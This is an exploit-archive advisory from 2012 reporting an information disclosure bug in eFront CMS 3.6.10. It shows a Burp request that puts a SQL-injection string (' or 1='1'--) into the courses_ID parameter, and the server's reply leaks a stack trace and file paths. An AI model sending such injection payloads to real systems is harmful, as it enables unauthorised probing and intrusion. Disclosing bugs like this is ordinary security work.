Home / exploits eFront CMS 3.6.10 Information Disclosure
Posted on 27 April 2012
[ TITLE ....... ][ eFront 3.6.10 CMS Information Disclosure bug [ DATE ........ ][ 11.04.2012 (public, after week or sth) [ AUTOHR ...... ][ http://hauntit.blogspot.com [ SOFT LINK ... ][ http:// [ VERSION ..... ][ 3.6.10 [ TESTED ON ... ][ LAMP [ ----------------------------------------------------------------------- [ [ 1. What is this? [ 2. What is the type of vulnerability? [ 3. Where is bug :) [ 4. More... [--------------------------------------------[ [ 1. What is this? This is very nice CMS, You should try it! ;) [--------------------------------------------[ [ 2. What is the type of vulnerability? Information disclosure. [--------------------------------------------[ [ 3. Where is bug :) Request from Burp: --- GET /efront/www/index.php?ctg=lesson_info&courses_ID='%20or%201%3d'1'-- HTTP/1.1 Host: localhost (...) --- And answer was: --- (...) <div class = "content" style = ";" id = "Error+Details_content" onmousedown = "if ($('firstlist')) {Sortable.destroy('firstlist');} if ($('secondlist')) {Sortable.destroy('secondlist');}"> <pre>#0 /home/kuba/www/efront/libraries/course.class.php(125): EfrontCourse->initializeDataFromSource('' or 1='1'--') #1 /home/kuba/www/efront/www/index.php(749): EfrontCourse->__construct('' or 1='1'--') #2 {main}</pre> (...) --- initializeDataFromSource(;]) ... [--------------------------------------------[ [ 4. More... - http://hauntit.blogspot.com - http://www.google.com - http://portswigger.net [ [--------------------------------------------[ [ Ask me about new projects @ mail. ;) ] [ Best regards [
